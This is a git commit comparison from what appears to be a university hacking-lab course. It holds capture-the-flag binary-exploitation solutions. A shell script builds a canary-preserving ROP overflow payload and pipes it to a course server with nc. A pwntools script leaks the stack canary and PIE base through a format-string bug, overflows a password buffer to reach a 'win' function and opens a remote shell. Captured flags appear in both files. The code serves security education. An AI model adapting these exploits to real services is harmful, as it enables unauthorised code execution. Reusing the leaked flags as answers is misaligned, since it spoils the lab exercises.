Compare commits
2 Commits
4c3e281ef5
...
3e0859b09e
| Author | SHA1 | Date | |
|---|---|---|---|
| 3e0859b09e | |||
| a4dc06d7e1 |
@@ -1,15 +1,11 @@
|
||||
# : | { ./test.sh | nc binexp.stud12.hacklab.ias.tu-bs.de 4006; } > /dev/fd/0;
|
||||
|
||||
#objdump
|
||||
#00000000004011d6 g F .text 000000000000003a win
|
||||
|
||||
OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
|
||||
PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #64
|
||||
SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00" #kind of irrelevant
|
||||
GADGET1="\x84\x12\x40\00\00\00\00\00" #ret (for stack alignment)
|
||||
GADGET2="\x83\x12\x40\00\00\00\00\00" #pop rdi, ret
|
||||
CMDADDR="\x48\x40\x40\00\00\00\00\00"
|
||||
CMDCALL="\xd6\x11\x40\00\00\00\00\00"
|
||||
#STACKPT="\x18\xde\xff\xff\xff\x7f\00\00"
|
||||
STACKPT="\x02\00\00\00\00\00\00\00"
|
||||
|
||||
read
|
||||
read
|
||||
@@ -26,7 +22,7 @@ read input
|
||||
>&2 echo $input
|
||||
|
||||
>&2 echo "writing canary + exploit"
|
||||
printf "\00$PADDING""1234567\00${canary:0:7}$STACKPT$CMDCALL\n"
|
||||
printf "\00$PADDING""1234567\00${canary:0:7}12345678$CMDCALL\n"
|
||||
read input
|
||||
>&2 echo "should be bye: "$input
|
||||
printf "cat flag.txt\n"
|
||||
|
||||
82
4/level7/test.py
Normal file
82
4/level7/test.py
Normal file
@@ -0,0 +1,82 @@
|
||||
#!/usr/bin/env python3
|
||||
from pwn import *
|
||||
|
||||
BINARY = "./level7"
|
||||
HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4007
|
||||
#HOST, PORT = "localhost", 4007
|
||||
|
||||
elf = ELF(BINARY, checksec=False)
|
||||
|
||||
def main():
|
||||
# 1) start remote
|
||||
p = remote(HOST, PORT)
|
||||
|
||||
# 2) read the question
|
||||
question = p.recvline(timeout=2)
|
||||
print("[+] question:", question.decode().strip())
|
||||
|
||||
question = p.recvline(timeout=2)
|
||||
print("[+] question:", question.decode().strip())
|
||||
|
||||
payload = "hacklab{st4ck_c00k1es_w0nt_5top_y0u_G0HNiuT0}"
|
||||
p.sendline(payload.encode())
|
||||
print("sending: ", end='')
|
||||
print(payload)
|
||||
|
||||
question = p.recvline(timeout=2)
|
||||
print("[+] question:", question.decode().strip())
|
||||
|
||||
question = p.recvline(timeout=2)
|
||||
print("[+] question:", question.decode().strip())
|
||||
|
||||
##############
|
||||
|
||||
question = p.recv(timeout=999)
|
||||
print("[+] got username prompt:", question.decode().strip())
|
||||
|
||||
# 3) build payload
|
||||
#offset = 32
|
||||
win = elf.symbols['win']
|
||||
#payload = b"A"*offset
|
||||
#payload += 0xa6#p64(win)
|
||||
#payload += b"\n"
|
||||
payload = "%7$p %9$p"
|
||||
p.sendline(payload.encode())
|
||||
print("sending: ", end='')
|
||||
print(payload)
|
||||
|
||||
leak = p.recvline(timeout=999)
|
||||
print("[+] leak:", leak)
|
||||
canary = int(leak[-35:-17],16)
|
||||
pieaddr = int(leak[-16:-2],16)
|
||||
print("[+] canary:", hex(canary))
|
||||
print("[+] pieaddr:", hex(pieaddr))
|
||||
|
||||
question = p.recv(timeout=999)
|
||||
print("[+] got username prompt:", question.decode().strip())
|
||||
|
||||
p.sendline("admin".encode())
|
||||
print("sending username \"admin\"")
|
||||
|
||||
question = p.recvline(timeout=999)
|
||||
print("[+] got username msg:", question.decode().strip())
|
||||
|
||||
question = p.recv(timeout=999)
|
||||
print("[+] got password prompt:", question.decode().strip())
|
||||
|
||||
payload = b"A"*40
|
||||
payload += p64(canary)
|
||||
payload += p64(pieaddr & 0xFFFFFFFFFFFFF000)
|
||||
payload += p64((pieaddr & 0xFFFFFFFFFFFFF000)+0x229)
|
||||
p.sendline(payload)
|
||||
print("sending payload: ", payload)
|
||||
|
||||
question = p.recvline(timeout=999)
|
||||
print("[+] got login msg:", question.decode().strip())
|
||||
|
||||
|
||||
# 5) we should now have a shell
|
||||
p.interactive()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Reference in New Issue
Block a user